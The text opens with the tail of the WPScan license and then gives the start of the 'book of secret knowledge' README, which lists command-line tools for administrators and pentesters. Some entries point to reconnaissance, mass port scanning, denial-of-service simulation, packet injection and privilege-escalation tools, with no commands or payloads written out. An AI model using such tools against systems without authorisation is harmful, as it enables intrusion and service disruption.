or non-infringing. ### 9. Limitation of Liability To the extent permitted under Law, WPScan is provided under an AS-IS basis. The WPScan Team shall never, and without any limit, be liable for any damage, cost, expense or any other payment incurred as a result of WPScan's actions, failure, bugs and/or any other interaction between WPScan and end-equipment, computers, other software or any 3rd party, end-equipment, computer or services. ### 10. Disclaimer Running WPScan against websites without prior mutual consent may be illegal in your country. The WPScan Team accept no liability and are not responsible for any misuse or damage caused by WPScan. ### 11. Trademark The "wpscan" term is a registered trademark. This License does not grant the use of the "wpscan" trademark or the use of the WPScan logo.
<p align="center"> <a href="https://github.com/trimstray/the-book-of-secret-knowledge"> <img src="https://github.com/trimstray/the-book-of-secret-knowledge/blob/master/static/img/the-book-of-secret-knowledge-preview.png" alt="Master"> </a> </p> <p align="center">"<i>Knowledge is powerful, be careful how you use it!</i>"</p> <h4 align="center">A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools, and more.</h4> <br> <p align="center"> <a href="https://github.com/trimstray/the-book-of-secret-knowledge/pulls"> <img src="https://img.shields.io/badge/PRs-welcome-brightgreen.svg?longCache=true" alt="Pull Requests"> </a> <a href="LICENSE.md"> <img src="https://img.shields.io/badge/License-MIT-lightgrey.svg?longCache=true" alt="MIT License"> </a> </p> <p align="center"> <a href="https://twitter.com/trimstray" target="_blank"> <img src="https://img.shields.io/twitter/follow/trimstray.svg?logo=twitter"> </a> </p> <div align="center"> <sub>Created by <a href="https://twitter.com/trimstray">trimstray</a> and <a href="https://github.com/trimstray/the-book-of-secret-knowledge/graphs/contributors">contributors</a> </div> <br> **** ## :notebook_with_decorative_cover: &nbsp;What is it? This repository is a collection of various materials and tools that I use every day in my work. It contains a lot of useful information gathered in one piece. It is an invaluable source of knowledge for me that I often look back on. ## :restroom: &nbsp;For whom? For everyone, really. Here everyone can find their favourite tastes. But to be perfectly honest, it is aimed towards System and Network administrators, DevOps, Pentesters, and Security Researchers. ## :information_source: &nbsp;Contributing If you find something which doesn't make sense, or something doesn't seem right, please make a pull request and please add valid and well-reasoned explanations about your changes or comments. A few simple rules for this project: - inviting and clear - not tiring - useful These below rules may be better: - easy to contribute to (Markdown + HTML ...) - easy to find (simple TOC, maybe it's worth extending them?) Url marked **\*** is temporary unavailable. Please don't delete it without confirming that it has permanently expired. Before adding a pull request, please see the **[contributing guidelines](.github/CONTRIBUTING.md)**. You should also remember about this: ```diff + This repository is not meant to contain everything but only good quality stuff. ``` All **suggestions/PR** are welcome! ### Code Contributors This project exists thanks to all the people who contribute. <a href="https://github.com/trimstray/the-book-of-secret-knowledge/graphs/contributors"><img src="https://opencollective.com/the-book-of-secret-knowledge/contributors.svg?width=890&button=false"></a> ### Financial Contributors <p align="left"> <a href="https://opencollective.com/the-book-of-secret-knowledge" alt="Financial Contributors on Open Collective"> <img src="https://img.shields.io/opencollective/backers/the-book-of-secret-knowledge?style=for-the-badge&color=FF4500&labelColor=A9A9A9"></a> </a> <a href="https://opencollective.com/the-book-of-secret-knowledge" alt="Financial Contributors on Open Collective"> <img src="https://img.shields.io/opencollective/sponsors/the-book-of-secret-knowledge?style=for-the-badge&color=FF4500&labelColor=A9A9A9"></a> </a> </p> ## :gift_heart: &nbsp;Support If this project is useful and important for you or if you really like _the-book-of-secret-knowledge_, you can bring **positive energy** by giving some **good words** or **supporting this project**. Thank you! ## :newspaper: &nbsp;RSS Feed & Updates GitHub exposes an [RSS/Atom](https://github.com/trimstray/the-book-of-secret-knowledge/commits.atom) feed of the commits, which may also be useful if you want to be kept informed about all changes. ## :ballot_box_with_check: &nbsp;ToDo - [ ] Add new stuff... - [ ] Add useful shell functions - [ ] Add one-liners for collection tools (eg. CLI Tools) - [ ] Sort order in lists New items are also added on a regular basis. ## :anger: &nbsp;Table of Contents Only main chapters: - **[CLI Tools](#cli-tools-toc)** - **[GUI Tools](#gui-tools-toc)** - **[Web Tools](#web-tools-toc)** - **[Systems/Services](#systemsservices-toc)** - **[Networks](#networks-toc)** - **[Containers/Orchestration](#containersorchestration-toc)** - **[Manuals/Howtos/Tutorials](#manualshowtostutorials-toc)** - **[Inspiring Lists](#inspiring-lists-toc)** - **[Blogs/Podcasts/Videos](#blogspodcastsvideos-toc)** - **[Hacking/Penetration Testing](#hackingpenetration-testing-toc)** - **[Your daily knowledge and news](#your-daily-knowledge-and-news-toc)** - **[Other Cheat Sheets](#other-cheat-sheets-toc)** - **[One-liners](#one-liners-toc)** - **[Shell functions](#shell-functions-toc)** ## :trident: &nbsp;The Book of Secret Knowledge (Chapters) #### CLI Tools &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Shells <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.gnu.org/software/bash/"><b>GNU Bash</b></a> - is an sh-compatible shell that incorporates useful features from the Korn shell and C shell.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.zsh.org/"><b>Zsh</b></a> - is a shell designed for interactive use, although it is also a powerful scripting language.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tcl-lang.org/"><b>tclsh</b></a> - is a very powerful cross-platform shell, suitable for a huge range of uses.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Bash-it/bash-it"><b>bash-it</b></a> - is a framework for using, developing and maintaining shell scripts and custom commands.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ohmyz.sh/"><b>Oh My ZSH!</b></a> - is the best framework for managing your Zsh configuration.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/oh-my-fish/oh-my-fish"><b>Oh My Fish</b></a> - the Fishshell framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/starship/starship"><b>Starship</b></a> - the cross-shell prompt written in Rust.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/romkatv/powerlevel10k"><b>powerlevel10k</b></a> - is a fast reimplementation of Powerlevel9k ZSH theme.<br> </p> ##### :black_small_square: Shell plugins <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rupa/z"><b>z</b></a> - tracks the folder you use the most and allow you to jump, without having to type the whole path.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/junegunn/fzf"><b>fzf</b></a> - is a general-purpose command-line fuzzy finder.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zsh-users/zsh-autosuggestions"><b>zsh-autosuggestions</b></a> - Fish-like autosuggestions for Zsh.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zsh-users/zsh-syntax-highlighting"><b>zsh-syntax-highlighting</b></a> - Fish shell like syntax highlighting for Zsh.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/unixorn/awesome-zsh-plugins"><b>Awesome ZSH Plugins</b></a> - A list of frameworks, plugins, themes and tutorials for ZSH.<br> </p> ##### :black_small_square: Managers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://midnight-commander.org/"><b>Midnight Commander</b></a> - is a visual file manager, licensed under GNU General Public License.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ranger/ranger"><b>ranger</b></a> - is a VIM-inspired filemanager for the console.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jarun/nnn"><b>nnn</b></a> - is a tiny, lightning fast, feature-packed file manager.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.gnu.org/software/screen/"><b>screen</b></a> - is a full-screen window manager that multiplexes a physical terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tmux/tmux/wiki"><b>tmux</b></a> - is a terminal multiplexer, lets you switch easily between several programs in one terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/peikk0/tmux-cssh"><b>tmux-cssh</b></a> - is a tool to set comfortable and easy to use functionality, clustering and synchronizing tmux-sessions.<br> </p> ##### :black_small_square: Text editors <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://ex-vi.sourceforge.net/"><b>vi</b></a> - is one of the most common text editors on Unix.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vim.org/"><b>vim</b></a> - is a highly configurable text editor.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.gnu.org/software/emacs/"><b>emacs</b></a> - is an extensible, customizable, free/libre text editor, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zyedidia/micro"><b>micro</b></a> - is a modern and intuitive terminal-based text editor.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://neovim.io/"><b>neovim</b></a> - is a free open source, powerful, extensible and usable code editor.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.spacemacs.org/"><b>spacemacs</b></a> - a community-driven Emacs distribution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://spacevim.org/"><b>spacevim</b></a> - a community-driven vim distribution.<br> </p> ##### :black_small_square: Files and directories <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sharkdp/fd"><b>fd</b></a> - is a simple, fast and user-friendly alternative to find.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dev.yorhel.nl/ncdu"><b>ncdu</b></a> - is an easy to use, fast disk usage analyzer.<br> </p> ##### :black_small_square: Network <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.putty.org/"><b>PuTTY</b></a> - is an SSH and telnet client, developed originally by Simon Tatham.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://mosh.org/"><b>Mosh</b></a> - is a SSH wrapper designed to keep a SSH session alive over a volatile connection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://eternalterminal.dev/"><b>Eternal Terminal</b></a> - enables mouse-scrolling and tmux commands inside the SSH session.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nmap.org/"><b>nmap</b></a> - is a free and open source (license) utility for network discovery and security auditing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zmap/zmap"><b>zmap</b></a> - is a fast single packet network scanner designed for Internet-wide network surveys.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/RustScan/RustScan"><b>Rust Scan</b></a> - to find all open ports faster than Nmap.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/robertdavidgraham/masscan"><b>masscan</b></a> - is the fastest Internet port scanner, spews SYN packets asynchronously.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gvb84/pbscan"><b>pbscan</b></a> - is a faster and more efficient stateless SYN scanner and banner grabber.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.hping.org/"><b>hping</b></a> - is a command-line oriented TCP/IP packet assembler/analyzer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/traviscross/mtr"><b>mtr</b></a> - is a tool that combines the functionality of the 'traceroute' and 'ping' programs in a single tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mehrdadrad/mylg"><b>mylg</b></a> - utility which combines the functions of the different network probes in one diagnostic tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://netcat.sourceforge.net/"><b>netcat</b></a> - utility which reads and writes data across network connections, using the TCP/IP protocol.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tcpdump.org/"><b>tcpdump</b></a> - is a powerful command-line packet analyzer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.wireshark.org/docs/man-pages/tshark.html"><b>tshark</b></a> - is a tool that allows us to dump and analyze network traffic (wireshark cli).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://termshark.io/"><b>Termshark</b></a> - is a simple terminal user-interface for tshark.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jpr5/ngrep"><b>ngrep</b></a> - is like GNU grep applied to the network layer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://netsniff-ng.org/"><b>netsniff-ng</b></a> - is a Swiss army knife for your daily Linux network plumbing if you will.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mechpen/sockdump"><b>sockdump</b></a> - dump unix domain socket traffic.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/stenographer"><b>stenographer</b></a> - is a packet capture solution which aims to quickly spool all packets to disk.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sachaos/tcpterm"><b>tcpterm</b></a> - visualize packets in TUI.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tgraf/bmon"><b>bmon</b></a> - is a monitoring and debugging tool to capture networking related statistics and prepare them visually.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://iptraf.seul.org/2.6/manual.html#installation"><b>iptraf-ng</b></a> - is a console-based network monitoring program for Linux that displays information about IP traffic.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vergoh/vnstat"><b>vnstat</b></a> - is a network traffic monitor for Linux and BSD.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://iperf.fr/"><b>iPerf3</b></a> - is a tool for active measurements of the maximum achievable bandwidth on IP networks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Microsoft/Ethr"><b>ethr</b></a> - is a Network Performance Measurement Tool for TCP, UDP & HTTP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jwbensley/Etherate"><b>Etherate</b></a> - is a Linux CLI based Ethernet and MPLS traffic testing tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mpolden/echoip"><b>echoip</b></a> - is a IP address lookup service.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/troglobit/nemesis"><b>Nemesis</b></a> - packet manipulation CLI tool; craft and inject packets of several protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/packetfu/packetfu"><b>packetfu</b></a> - a mid-level packet manipulation library for Ruby.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://scapy.net/"><b>Scapy</b></a> - packet manipulation library; forge, send, decode, capture packets of a wide number of protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/SecureAuthCorp/impacket"><b>impacket</b></a> - is a collection of Python classes for working with network protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/arthepsy/ssh-audit"><b>ssh-audit</b></a> - is a tool for SSH server auditing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://aria2.github.io/"><b>aria2</b></a> - is a lightweight multi-protocol & multi-source command-line download utility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/x-way/iptables-tracer"><b>iptables-tracer</b></a> - observe the path of packets through the iptables chains.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/proabiral/inception"><b>inception</b></a> - a highly configurable tool to check for whatever you like against any number of hosts.<br> </p> ##### :black_small_square: Network (DNS) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/farrokhi/dnsdiag"><b>dnsdiag</b></a> - is a DNS diagnostics and performance measurement tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mschwager/fierce"><b>fierce</b></a> - is a DNS reconnaissance tool for locating non-contiguous IP space.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/subfinder/subfinder"><b>subfinder</b></a> - is a subdomain discovery tool that discovers valid subdomains for websites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/aboul3la/Sublist3r"><b>sublist3r</b></a> - is a fast subdomains enumeration tool for penetration testers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/Amass"><b>amass</b></a> - is tool that obtains subdomain names by scraping data sources, crawling web archives, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/namebench"><b>namebench</b></a> - provides personalized DNS server recommendations based on your browsing history.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/blechschmidt/massdns"><b>massdns</b></a> - is a high-performance DNS stub resolver for bulk lookups and reconnaissance.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/guelfoweb/knock"><b>knock</b></a> - is a tool to enumerate subdomains on a target domain through a wordlist.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/DNS-OARC/dnsperf"><b>dnsperf</b></a> - DNS performance testing tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jedisct1/dnscrypt-proxy"><b>dnscrypt-proxy 2</b></a> - a flexible DNS proxy, with support for encrypted DNS protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dnsdb/dnsdbq"><b>dnsdbq</b></a> - API client providing access to passive DNS database systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/looterz/grimd"><b>grimd</b></a> - fast dns proxy, built to black-hole internet advertisements and malware servers.<br> </p> ##### :black_small_square: Network (HTTP) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://curl.haxx.se/"><b>curl</b></a> - is a command line tool and library for transferring data with URLs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gitlab.com/davidjpeacock/kurly"><b>kurly</b></a> - is an alternative to the widely popular curl program, written in Golang.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jakubroztocil/httpie"><b>HTTPie</b></a> - is an user-friendly HTTP client.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/asciimoo/wuzz"><b>wuzz</b></a> - is an interactive cli tool for HTTP inspection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/summerwind/h2spec"><b>h2spec</b></a> - is a conformance testing tool for HTTP/2 implementation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gildasio/h2t"><b>h2t</b></a> - is a simple tool to help sysadmins to hardening their websites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/trimstray/htrace.sh"><b>htrace.sh</b></a> - is a simple Swiss Army knife for http/https troubleshooting and profiling.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/reorx/httpstat"><b>httpstat</b></a> - is a tool that visualizes curl statistics in a way of beauty and clarity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gchaincl/httplab"><b>httplab</b></a> - is an interactive web server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lynx.browser.org/"><b>Lynx</b></a> - is a text browser for the World Wide Web.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/browsh-org/browsh/"><b>Browsh</b></a> - is a fully interactive, real-time, and modern text-based browser.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dhamaniasad/HeadlessBrowsers"><b>HeadlessBrowsers</b></a> - a list of (almost) all headless web browsers in existence.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://httpd.apache.org/docs/2.4/programs/ab.html"><b>ab</b></a> - is a single-threaded command line tool for measuring the performance of HTTP web servers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.joedog.org/siege-home/"><b>siege</b></a> - is an http load testing and benchmarking utility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/wg/wrk"><b>wrk</b></a> - is a modern HTTP benchmarking tool capable of generating significant load.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/giltene/wrk2"><b>wrk2</b></a> - is a constant throughput, correct latency recording variant of wrk.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tsenart/vegeta"><b>vegeta</b></a> - is a constant throughput, correct latency recording variant of wrk.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/codesenberg/bombardier"><b>bombardier</b></a> - is a fast cross-platform HTTP benchmarking tool written in Go.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/cmpxchg16/gobench"><b>gobench</b></a> - http/https load testing and benchmarking tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rakyll/hey"><b>hey</b></a> - HTTP load generator, ApacheBench (ab) replacement, formerly known as rakyll/boom.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tarekziade/boom"><b>boom</b></a> - is a script you can use to quickly smoke-test your web app deployment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/shekyan/slowhttptest"><b>SlowHTTPTest</b></a> - is a tool that simulates some Application Layer Denial of Service attacks by prolonging HTTP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OJ/gobuster"><b>gobuster</b></a> - is a free and open source directory/file & DNS busting tool written in Go.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ssllabs/ssllabs-scan"><b>ssllabs-scan</b></a> - command-line reference-implementation client for SSL Labs APIs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mozilla/http-observatory"><b>http-observatory</b></a> - Mozilla HTTP Observatory cli version.<br> </p> ##### :black_small_square: SSL <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openssl.org/"><b>openssl</b></a> - is a robust, commercial-grade, and full-featured toolkit for the TLS and SSL protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gnutls.org/manual/html_node/gnutls_002dcli-Invocation.html"><b>gnutls-cli</b></a> - client program to set up a TLS connection to some other computer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/nabla-c0d3/sslyze"><b>sslyze </b></a> - fast and powerful SSL/TLS server scanning library.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rbsec/sslscan"><b>sslscan</b></a> - tests SSL/TLS enabled services to discover supported cipher suites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/drwetter/testssl.sh"><b>testssl.sh</b></a> - testing TLS/SSL encryption anywhere on any port.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mozilla/cipherscan"><b>cipherscan</b></a> - a very simple way to find out which SSL ciphersuites are supported by a target.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.tarsnap.com/spiped.html"><b>spiped</b></a> - is a utility for creating symmetrically encrypted and authenticated pipes between socket addresses.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/certbot/certbot"><b>Certbot</b></a> - is EFF's tool to obtain certs from Let's Encrypt and (optionally) auto-enable HTTPS on your server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/FiloSottile/mkcert"><b>mkcert</b></a> - simple zero-config tool to make locally trusted development certificates with any names you'd like.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/square/certstrap"><b>certstrap</b></a> - tools to bootstrap CAs, certificate requests, and signed certificates.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/yassineaboukir/sublert"><b>Sublert</b></a> - is a security and reconnaissance tool to automatically monitor new subdomains.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/trimstray/mkchain"><b>mkchain</b></a> - open source tool to help you build a valid SSL certificate chain.<br> </p> ##### :black_small_square: Security <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/ch-selinux"><b>SELinux</b></a> - provides a flexible Mandatory Access Control (MAC) system built into the Linux kernel.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.ubuntu.com/AppArmor"><b>AppArmor</b></a> - proactively protects the operating system and applications from external or internal threats.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/grapheneX/grapheneX"><b>grapheneX</b></a> - Automated System Hardening Framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dev-sec/"><b>DevSec Hardening Framework</b></a> - Security + DevOps: Automatic Server Hardening.<br> </p> ##### :black_small_square: Auditing Tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ossec.net/"><b>ossec</b></a> - actively monitoring all aspects of system activity with file integrity monitoring.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing"><b>auditd</b></a> - provides a way to track security-relevant information on your system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.nongnu.org/tiger/"><b>Tiger</b></a> - is a security tool that can be use both as a security audit and intrusion detection system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cisofy.com/lynis/"><b>Lynis</b></a> - battle-tested security tool for systems running Linux, macOS, or Unix-based operating system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rebootuser/LinEnum"><b>LinEnum</b></a> - scripted Local Linux Enumeration & Privilege Escalation Checks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/installation/rkhunter"><b>Rkhunter</b></a> - scanner tool for Linux systems that scans backdoors, rootkits and local exploits on your systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/hasherezade/pe-sieve"><b>PE-sieve</b></a> - is a light-weight tool that helps to detect malware running on the system.<br> </p> ##### :black_small_square: System Diagnostics/Debuggers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/strace/strace"><b>strace</b></a> - diagnostic, debugging and instructional userspace utility for Linux.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://dtrace.org/blogs/about/"><b>DTrace</b></a> - is a performance analysis and troubleshooting tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://en.wikipedia.org/wiki/Ltrace"><b>ltrace</b></a> - is a library call tracer, used to trace calls made by programs to library functions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/brainsmoke/ptrace-burrito"><b>ptrace-burrito</b></a> - is a friendly wrapper around ptrace.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/brendangregg/perf-tools"><b>perf-tools</b></a> - performance analysis tools based on Linux perf_events (aka perf) and ftrace.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/iovisor/bpftrace"><b>bpftrace</b></a> - high-level tracing language for Linux eBPF.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/draios/sysdig"><b>sysdig</b></a> - system exploration and troubleshooting tool with first class support for containers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.valgrind.org/"><b>Valgrind</b></a> - is an instrumentation framework for building dynamic analysis tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gperftools/gperftools"><b>gperftools</b></a> - high-performance multi-threaded malloc() implementation, plus some performance analysis tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nicolargo.github.io/glances/"><b>glances</b></a> - cross-platform system monitoring tool written in Python.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/hishamhm/htop"><b>htop</b></a> - interactive text-mode process viewer for Unix systems. It aims to be a better 'top'.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/aristocratos/bashtop"><b>bashtop</b></a> - Linux resource monitor written in pure Bash.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://nmon.sourceforge.net/pmwiki.php"><b>nmon</b></a> - a single executable for performance monitoring and data analysis.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.atoptool.nl/"><b>atop</b></a> - ASCII performance monitor. Includes statistics for CPU, memory, disk, swap, network, and processes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://en.wikipedia.org/wiki/Lsof"><b>lsof</b></a> - displays in its output information about files that are opened by processes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.brendangregg.com/flamegraphs.html"><b>FlameGraph</b></a> - stack trace visualizer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zevv/lsofgraph"><b>lsofgraph</b></a> - convert Unix lsof output to a graph showing FIFO and UNIX interprocess communication.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mozilla/rr"><b>rr</b></a> - is a lightweight tool for recording, replaying and debugging execution of applications.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pcp.io/index.html"><b>Performance Co-Pilot</b></a> - a system performance analysis toolkit.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sharkdp/hexyl"><b>hexyl</b></a> - a command-line hex viewer.<br> </p> ##### :black_small_square: Log Analyzers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rcoh/angle-grinder"><b>angle-grinder</b></a> - slice and dice log files on the command line.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lnav.org"><b>lnav</b></a> - log file navigator with search and automatic refresh.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://goaccess.io/"><b>GoAccess</b></a> - real-time web log analyzer and interactive viewer that runs in a terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/lebinh/ngxtop"><b>ngxtop</b></a> - real-time metrics for nginx server.<br> </p> ##### :black_small_square: Databases <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/xo/usql"><b>usql</b></a> - universal command-line interface for SQL databases.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dbcli/pgcli"><b>pgcli</b></a> - postgres CLI with autocompletion and syntax highlighting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dbcli/mycli"><b>mycli</b></a> - terminal client for MySQL with autocompletion and syntax highlighting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dbcli/litecli"><b>litecli</b></a> - SQLite CLI with autocompletion and syntax highlighting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/osquery/osquery"><b>OSQuery</b></a> - is a SQL powered operating system instrumentation, monitoring, and analytics framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ankane/pgsync"><b>pgsync</b></a> - sync data from one Postgres database to another.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/laixintao/iredis"><b>iredis</b></a> - a terminal client for redis with autocompletion and syntax highlighting.<br> </p> 